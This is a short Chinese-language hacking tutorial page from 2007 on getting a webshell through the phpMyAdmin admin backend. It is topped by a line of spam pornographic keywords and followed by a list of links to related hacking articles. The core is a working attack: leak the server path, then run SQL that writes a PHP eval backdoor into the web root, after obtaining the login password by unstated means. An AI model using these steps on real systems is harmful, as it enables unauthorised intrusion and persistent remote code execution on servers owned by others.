欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

phpMyAdmin 后臺(tái)拿webshell

更新時(shí)間：2007年03月08日 00:00:00 作者：

1.如何拿到登陸密碼. 自己想辦法
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個(gè)Database.運(yùn)行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對(duì)應(yīng)網(wǎng)站得到webshell

相關(guān)文章

小談RADMIN的幾個(gè)小技巧
小談RADMIN的幾個(gè)小技巧...
2007-10-10
開放IPC$共享
開放IPC$共享...
2007-01-01
expression&eval跨站的一個(gè)方法
expression&eval跨站的一個(gè)方法...
2007-03-03
常用軟件的靜默安裝方法介紹
大部分軟件，其安裝都具備一定的智能性，換句話說，許多軟件的安裝都能采取全自動(dòng)或半自動(dòng)的方式進(jìn)行
2007-03-03
PHP服務(wù)端SESSION管理工具提供下載
PHP服務(wù)端SESSION管理工具提供下載...
2007-10-10
Dedecms getip()的漏洞利用代碼
flyh4t在非安全發(fā)布了dedecms getip()的注射漏洞，漏洞本身的成因沒什么好說的老掉牙的X-Forwarded-For的問題，我想這個(gè)漏洞很多人都找到了，不過這個(gè)漏洞的利用有個(gè)地方還是可以說說的，可以直接得到shell：
2008-05-05
國(guó)內(nèi)外黑客組織網(wǎng)址集錦
國(guó)內(nèi)外黑客組織網(wǎng)址集錦...
2007-06-06
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
在國(guó)外對(duì)ORACLE的攻擊一直很收關(guān)注,只是國(guó)內(nèi)研究的人不太多,或者技術(shù)不夠~這里我就打響第一炮吧
2007-10-10
一個(gè)黑客所需的基本技能總結(jié)
一個(gè)黑客所需的基本技能總結(jié)...
2007-11-11
新編MS07004網(wǎng)頁木馬源碼代碼
新編MS07004網(wǎng)頁木馬源碼代碼...
2007-03-03

最新評(píng)論

<kbd id="dhh5l"></kbd>

<p id="dhh5l"></p>